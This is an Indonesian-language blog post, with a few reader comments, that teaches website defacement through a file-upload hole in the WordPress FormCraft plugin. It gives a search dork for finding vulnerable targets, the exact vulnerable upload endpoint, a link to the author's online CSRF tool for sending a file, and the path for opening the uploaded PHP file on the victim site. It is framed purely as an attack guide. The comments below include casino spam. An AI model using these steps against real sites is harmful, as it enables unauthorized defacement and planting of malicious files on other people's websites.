Kali ini ilmu deface akan share Cara Deface Website Metode Formcraft File Upload .
Baiklah, kita mulai saja cara deface metode Formcraft File Upload
1. Cari target menggunakan dork dibawah. Silahkan kembangkan sendiri.
inurl:/wp-content/plugins/formcraft/
2. Buka target, lalu tambahkan exploitnya setelah kata "/formcraft/” (tanpa tanda petik). Jika target tersebut vuln maka tampilanya kurang lebih seperti ini.
http://[site]/[path]/wp-content/plugins/formcraft/file-upload/server/php/index.php
3. Buka CSRF (saya menggunakan CSRF online buatan saya) http://sh.st/YiF8, masukan datanya seperti pada gambar.
4. Jika file berhasil terunggah maka tampilanya seperti gambar.
5. Buka file kalian yang telah terunggah di http://[site]/[path]/[exploit]/files/[filekalian].php
http://[site]/[path]/wp-content/plugins/formcraft/file-upload/server/php/files/[filekalian].php
test dulu gan
ReplyDeletethanks kunjungan nya gan
DeleteI enjoyed over read your blog post. Your blog have nice information,
ReplyDeleteI got good ideas from this amazing blog
goldenslot
gclub online